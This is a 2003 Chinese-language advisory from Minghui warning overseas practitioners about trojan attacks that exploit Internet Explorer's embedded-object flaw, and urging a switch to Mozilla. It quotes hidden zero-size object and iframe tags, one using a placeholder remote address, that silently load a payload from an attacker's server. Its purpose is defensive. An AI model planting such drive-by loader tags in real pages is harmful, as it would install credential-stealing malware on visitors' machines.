IE安全漏洞多　建议换用其它浏览器

【明慧网2003年11月11日】在邪恶最近发起的针对海外学员的电脑病毒攻击中，主要利用的是微软的互联网浏览器 IE (Internet Explorer) 安全漏洞。在此建议放弃IE，换用其它浏览器，并将新浏览器设为“Default"(默认浏览器)，这样将大大减少中毒的机会。尤其是掌握不好防火墙应该放过哪些程序的学员，更应及早更换。

本文将详细的介绍一些这方面的情况，对IE的漏洞有个更清晰的认识。

这几年邪恶在电脑攻击方面的发展过程大致是：

1、从大陆直接攻击海外大法网站，造成无法登陆。
2、在海外找跳板，再攻击大法网站。
3、盗用大法网站的名义，去攻击美国政府网站。
4、设立代理服务器作陷阱。
5、在学员邮件通讯之间传播病毒，主要是一些社会上流行的病毒。
6、在跟踪学员邮件之后，模仿学员的口气，语言，传播病毒。主要是用附件方式。

在大家的完全意识越来越强之后，特别是对打开邮件附件的警惕，邪恶的这些招术也就不太起作用了。

事实上，邪恶的这些“破坏性攻击“只是图一时之痛快，现在他们也慢慢放弃这种低能行为，而是逐渐转向更具目的性的“收集有用信息”的方向。传播“木马”程序成为他们的重点。

“木马”就是在你不知道的情况下，偷偷在你的电脑里安装的程序，每次开机，这个程序也自动起动，在背后运行，监视你的键盘操作并记录帐号、密码，收集你的地址簿，扫描所有文档，偷取有用消息，目的就是要把这些东西传回给一个远程服务器。

种植木马并不容易，过去通常都要用户先运行一个程序(比如打开邮件附件)，但是，随着微软的 IE 安全漏洞被曝光，直接访问一个网页就可在你电脑里种上木马，这就更加隐蔽，邪恶立即疯狂采用。

他们“木马”的传播方式有以下特点：

1）内容：

模拟真相邮件，包括：“大审判”，“多种形式讲真相”；说一些好奇的东西，如“神五现场出现UFO”；或者是传递一些大陆学员XX被捕等内幕消息。总之，尽可能揣摩人的心里，这在病毒界称为“SOCIAL ENGINEERING”， 就是“社会工程学”，利用人的心理弱点，来引诱人阅读其内容。

2）网页联接：

光是阅读邮件内容，还不足，必须要让你访问一个网页。通常会说，“请点击这里了解最新进展”，这就会连到一个网页上，而这个网页会包含“恶毒代码”，主要是利用 IE 的“内嵌对象”(EMBEDDED OBJECT)的漏洞，如果打开页面的源代码 (VIEW SOURCE)，就会看到类似这样的代码：

＜object data="lhxyexe.asp" height=0 width=0＞＜/object＞
＜object data="lhxyhta.asp" height=0 width=0＞＜/object＞

或者被包装起来，象这样：
＜iframe src="mm.html" name="id" width="0" height="0" frameborder="0"＞，而mm.html才包含上面的 object 代码。

这里的秘密就在于，“height=0 width=0”，所以在页面上是不可见的。

3）网页附件：

当大家都在谈论“网页联接”，而不要去点击可疑 联接 (URL) 时，邪恶又采用了一个新的形式，就是直接送一个 HTML 附件给你，通常人们对于这样的文本附件不会起疑心。错了！这个HTML 页面里，也会嵌入“恶毒代码”，但是，它必须直接用完整的URL：
＜object data="https://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0 width=0＞＜/object＞

4）存放恶毒代码的服务器开始移到海外：

开始的时候，恶毒代码要访问一个国内的网站去直接下载木马，发现有上海、山东等地的；它也利用国内的门户网站来转接到自己的服务器上，比如，你看上去访问的是网易的网站 https://abckdkd.nease.net, 但网易提供了域名转接，这个网站马上被转到一个另外一个邪恶控制的服务器上。

我们说要装上防火墙，如果莫名出现访问大陆的 IP 地址，就要小心。于是，邪恶就开始在海外申请网站空间。最近发现一个是在美国，一个是在东南亚某国。

面对这种防不胜防的局面，怎么办？

其实很简单。邪恶利用的就是 IE 的漏洞。放弃IE 就是釜底抽薪，彻底没有了它的黑手可钻的空子。所以，大家一定要引起重视。

其它的好的浏览器可以用 Mozilla 或 Netscape。 Mozilla 安装很简单, 请访问 www.mozilla.com。

关键的问题是要把 Mozilla 设置成“Default”(默认浏览器) ，就是你点击一个 URL 联结，弹出的就是Mozilla 而不是 IE。

有些多媒体网站，Mozilla 不一定支持得很好。IE 是不是就不能用呢？也不是。如果你确认网站是安全的，是没有问题的，比如上放光明网站。

总之，放弃IE是目前最方便地抵制邪恶杜绝木马的一个方法，希望大家充份重视起来。